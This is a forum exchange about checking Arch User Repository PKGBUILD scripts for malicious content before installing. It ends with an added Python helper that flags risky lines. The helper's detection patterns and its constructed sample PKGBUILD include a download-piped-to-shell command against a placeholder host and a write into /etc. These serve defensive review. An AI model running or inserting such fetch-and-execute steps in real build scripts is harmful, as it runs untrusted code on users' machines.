Building a package that is not in the official repos, but is in AUR

I have been cautioned on this forum not to blindly install packages from AUR using yaourt because they could lead to problems, including execution of malicious code, and rendering my system unusable.

I am now thinking of trying my hand at making a package that is not in the official repos: audacious-qt5

It appears that the most difficult part is to generate the PKGBUILD script. I have gleaned from the Web that one should check the PKGBUILD script to see if it is “safe” before installing something that AUR points to.

I have come across a question entitled Convenient way to check AUR PKGBUILD against malicious code? but unfortunately, it remains unanswered.

Are there any guidelines on where and what to look for in a PKGBUILD to ensure that it is safe?

And, might one, after scanning and convincing oneself that the PKGBUILD is safe, install from AUR using yaourt? Or does one need to build the package oneself, as would be the case if the PKGBUILD needed to be changed?

The information on building Arch packages is too “componentized” and distributed across several wikis to give a coherent overall picture of the process. A single example of how to do this from alpha to omega with any “helper” would be very useful to one who hasn’t done it before. Is there such a tutorial?

Also, can one use the AUR directly, or should one use other repos, because NRR is built upon Manjaro which is on top of Arch?

Sorry for the number of questions and their length.

Thanks.

First, Manjaro is NOT built on top of Arch; they use their own repositories. They also use a different graphics stack and hardware detection (MHWD) than Arch and provide multiple kernel versions for you to choose from, as well as many other packages that are not found in Arch proper. However, yes, many of their packages are pulled from the Arch stable repository into their own unstable repository, where they are vetted and sent to testing; after a week or so of testing they are then sent on to stable once deemed as such.

Installing packages from the AUR is mostly safe; however, you should take note as to where the source code or rpm/deb files are coming from. If they are from the original developer's sources or another distribution's repositories they are usually safe. If they are not from an official source and are hosted elsewhere, then you need to ask yourself how much you trust that source and/or the maintainer of that AUR entry.

You are asked during the yaourt process if you would like to edit the PKGBUILD; this is the best way of viewing and editing the PKGBUILD yourself. You can also screen these beforehand by using the online AUR search here:
https://aur.archlinux.org/
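As an added illustration of the review the answer describes (example code, not from either poster and not an Arch or AUR tool): a hypothetical Python helper that pulls the source= and checksum arrays out of a PKGBUILD without executing it, flags sources outside an assumed list of trusted hosts or with SKIP checksums, and points at build steps that fetch-and-run code or write outside $pkgdir. The PKGBUILD it inspects is a constructed sample, and TRUSTED_HOSTS is an assumption to adjust to your own trust decisions.

```python
"""Heuristic PKGBUILD reviewer: a hypothetical helper, not an Arch or AUR tool.
It flags sources and lines a human should read closely; it proves nothing."""
import re

# Hosts treated as legitimate upstream/distro origins (assumed list; adjust it).
TRUSTED_HOSTS = ("github.com", "gitlab.com", "archlinux.org", "sourceforge.net")
# Constructs a careful reviewer stops at before running makepkg.
SUSPICIOUS = [
    (r"\bsudo\b", "uses sudo (a build never needs root)"),
    (r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b", "pipes a download into a shell"),
    (r"\b(cp|install|mv|tee)\b.*\s/(etc|usr|home|root)/", "writes outside $pkgdir"),
    (r"\bbase64\s+(-d|--decode)\b|\beval\b", "decodes or evals constructed text"),
]

def _array(name, text):
    """Items of a bash array such as source=(...), parsed without sourcing the file."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    return re.findall(r"[^'\"\s]+", m.group(1)) if m else []

def review_pkgbuild(text):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings, sources = [], _array("source", text)
    for src in sources:
        url = src.split("::", 1)[-1]                 # drop optional "name::" prefix
        if "://" in url:
            host = url.split("://", 1)[1].split("/", 1)[0]
            if not any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS):
                findings.append(f"source from unlisted host {host}: {url}")
    sums = [s for n in ("sha256sums", "sha512sums", "b2sums", "md5sums")
            for s in _array(n, text)]
    if len(sums) < len(sources):
        findings.append("fewer checksums than sources")
    if "SKIP" in sums:
        findings.append("checksum SKIP: that source's integrity is never verified")
    for lineno, line in enumerate(text.splitlines(), 1):
        for pat, why in SUSPICIOUS:
            if re.search(pat, line):
                findings.append(f"line {lineno}: {why}: {line.strip()}")
    return findings

# Constructed sample (not a real AUR entry) mixing good and bad habits.
SAMPLE = """\
source=("https://github.com/audacious-media-player/audacious/archive/3.9.tar.gz"
        "helper.sh::https://files.example.net/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
build() {
  curl -s https://files.example.net/setup | sh
}
package() {
  make DESTDIR="$pkgdir" install
  cp extra.conf /etc/audacious.conf
}
"""
```

Running `review_pkgbuild(SAMPLE)` yields four findings: the unlisted host, the SKIP checksum, the piped download on line 6 and the write to /etc on line 10; everything it flags still has to be read by a person before building.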